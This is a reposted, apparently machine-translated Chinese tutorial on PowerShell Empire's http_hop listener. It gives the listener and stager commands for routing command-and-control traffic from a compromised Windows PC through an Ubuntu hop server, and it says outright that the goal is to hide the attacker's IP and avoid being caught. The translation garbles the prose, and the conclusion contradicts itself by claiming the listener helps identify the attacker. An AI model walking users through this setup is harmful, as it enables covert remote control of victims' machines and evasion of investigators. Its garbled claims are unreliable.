在本文中,我們學習了在PowerShell帝國中使用躍點有效負載,Empire擁有一個名為http_hop的內置偵聽器,它使我們可以在獲取代理后將流量重定向到另一個活動的偵聽器之一,因此,名稱將其從一個偵聽器跳到另一個偵聽器時進行跳轉,以重定向流量,
與Metasploit相似,帝國中的躍點偵聽器使用hop.php檔案,當您激活跳偵聽器時,它將生成三個PHP檔案,這些檔案將重定向您現有的偵聽器,將所述檔案放在您的跳轉服務器(ubuntu)中,然后根據調解器(即我們的躍點監聽器)獲取會話,從而設定您的stager,
在下圖中,您可以看到我們Kali的IP,現在,我們將嘗試使用http_hop有效負載通過ubuntu進行Windows會話,以便隱藏我們自己的IP,即,基本上,我們的http_hop有效負載將幫助我們(攻擊者)從被捕獲的位置隱藏,
在下圖中,您也可以看到我們的ubuntu的IP,
現在,讓我們開始吧,首先,對于該型別,我們應該有一個簡單的http偵聽器:
uselistener http
execute
現在,輸入以下命令啟動http_hop偵聽器:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
在這里,我們給了RedirectListener,即來自http監聽器的所有流量都將被定向到 http_hop 監聽器,
執行上面的偵聽器將創建三個檔案,如上圖所示,將這些檔案傳輸到 Ubuntu的/ var / www / html位置,如下圖所示:
現在,您可以在下圖中看到我們激活了兩個偵聽器:
讓我們通過鍵入以下命令來啟動stager:
usestager windows/launcher_bat
set Listener http_hop
execute
在目標PC中執行了bat檔案后,我們將進行會話,現在,如果您觀察到我們通過其獲取會話的IP是 Ubuntu的,而不是Windows的,但是我們可以訪問 Windows PC,同樣,在Windows中,它將顯示攻擊的計算機是Ubuntu,而不是kali,因此,我們的http_hop是有效的,
總之, http_hop 偵聽器的主要優點是,由于該偵聽器隱藏了原始IP,因此可以幫助將攻擊者識別為在目標PC上,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/121832.html
標籤:其他